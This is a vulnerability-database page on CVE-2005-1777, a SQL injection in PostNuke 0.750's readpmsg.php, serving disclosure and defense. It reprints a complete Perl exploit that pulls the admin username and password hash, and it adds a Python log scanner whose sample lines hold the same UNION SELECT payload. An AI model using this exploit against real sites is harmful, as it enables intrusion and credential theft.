CVE-2005-1777
CVSS 7.5
Published: 2005-05-31 00:00:00
Revised: 2016-10-17 23:22:29
NMCOE

[Original] SQL injection vulnerability in readpmsg.php in PostNuke 0.750 allows remote attackers to execute arbitrary SQL commands via the start parameter.


[CNNVD] PostNuke SQL Injection Vulnerability (CNNVD-200505-1239)

A SQL injection vulnerability exists in readpmsg.php in PostNuke 0.750; a remote attacker can execute arbitrary SQL commands via the start parameter.

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1777
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1777
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1239
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=111721364707520&w=2
(UNKNOWN)  BUGTRAQ  20050527 PostNuke Critical SQL Injection and XSS 0.750=>x
http://news.postnuke.com/Article2691.html
(VENDOR_ADVISORY)  CONFIRM  http://news.postnuke.com/Article2691.html
http://securitytracker.com/id?1014066
(UNKNOWN)  SECTRACK  1014066

- Vulnerability Information

PostNuke SQL Injection Vulnerability
High risk, SQL injection
2005-05-31 00:00:00 2006-04-07 00:00:00
Remote
A SQL injection vulnerability exists in readpmsg.php in PostNuke 0.750; a remote attacker can execute arbitrary SQL commands via the start parameter.

- Advisories and Patches


- Vulnerability Information (1030)

PostNuke <= 0.750 readpmsg.php SQL Injection Exploit (EDBID:1030)
php webapps
2005-06-05 Verified
0 K-C0d3r
N/A
#!/usr/bin/perl
# This tool is only for educational purposes
#
# K-C0d3r a x0n3-h4ck friend !!!
#
# This exploit should give admin nick and md5 password
#
#-=[ PostNuke SQL Injection                     version : x=> 0.750]=-
#-=[                                                               ]=-
#-=[ Discovered by sp3x                                            ]=-
#-=[ Coded by K-C0d3r                                              ]=-
#-=[ irc.xoned.net #x0n3-h4ck to find me   K-c0d3r[at]x0n3-h4ck.org]=-
#
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
#
# !!! NOW IS PUBLIC (6-6-2005) !!!

use IO::Socket;

sub Usage {
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
exit;
}

if (@ARGV < 2)
{
 Usage();
}

if (@ARGV > 2)
{
 Usage();
}

if (@ARGV == 2)
{
$host = $ARGV[0];
$path = $ARGV[1];

print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
print "[+] Connecting to $host\n";

$injection = "$host\/$path?";
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
die unless $socket;

print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

# milw0rm.com [2005-06-05]

- Vulnerability Information

16781
PostNuke Message Module readpmsg.php Start Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability Description

PostNuke contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the "start" variable in the "/modules/Messages/readpmsg.php" script not being properly sanitized, which may allow an attacker to inject or manipulate SQL queries.
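As an added example (not part of this record, the OSVDB entry or PostNuke's own code), the following Python check scans web-server access-log lines for requests to the Messages/readpmsg handler whose start parameter is not a plain non-negative integer, which is the shape of the request the public exploit above sends. The sample log lines are constructed, and the check generalizes past the UNION payload to any non-numeric start value.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the page). Lines 3 and 4
# carry a non-numeric "start" value, the shape of the public exploit's request.
SAMPLE_LOG = """\
10.0.0.5 - - [27/May/2005:10:01:02 +0000] "GET /modules.php?op=modload&name=Messages&file=readpmsg&start=0&total_messages=1 HTTP/1.1" 200 5120
10.0.0.6 - - [27/May/2005:10:01:09 +0000] "GET /modules.php?op=modload&name=Messages&file=readpmsg&start=20 HTTP/1.1" 200 4000
10.0.0.7 - - [27/May/2005:10:02:15 +0000] "GET /modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1 HTTP/1.1" 200 6100
10.0.0.8 - - [27/May/2005:10:03:40 +0000] "GET /modules.php?op=modload&name=Messages&file=readpmsg&start=1%27%20OR%201=1 HTTP/1.1" 200 6100
"""

# Common Log Format prefix: client, ident, user, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def readpmsg_start_value(target):
    """Return the percent-decoded start value if the request targets the
    Messages/readpmsg handler, else None (parse_qs decodes %XX for us)."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("name") != ["Messages"] or qs.get("file") != ["readpmsg"]:
        return None
    return qs.get("start", [None])[0]


def is_readpmsg_injection(target):
    """True when readpmsg is called with a start value that is not a plain
    non-negative integer, the only form a paging offset should ever take."""
    start = readpmsg_start_value(target)
    return start is not None and re.fullmatch(r"[0-9]+", start) is None


def scan_access_log(text):
    """Return (client_ip, decoded start value) for each suspicious readpmsg request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_readpmsg_injection(m.group("target")):
            hits.append((m.group("ip"), readpmsg_start_value(m.group("target"))))
    return hits


if __name__ == "__main__":
    for ip, start in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: suspicious readpmsg start={start!r}")
```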

- Timeline

2005-05-20 Unknown
2005-05-27 Unknown

- Solution

Upgrade to version 0.750b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.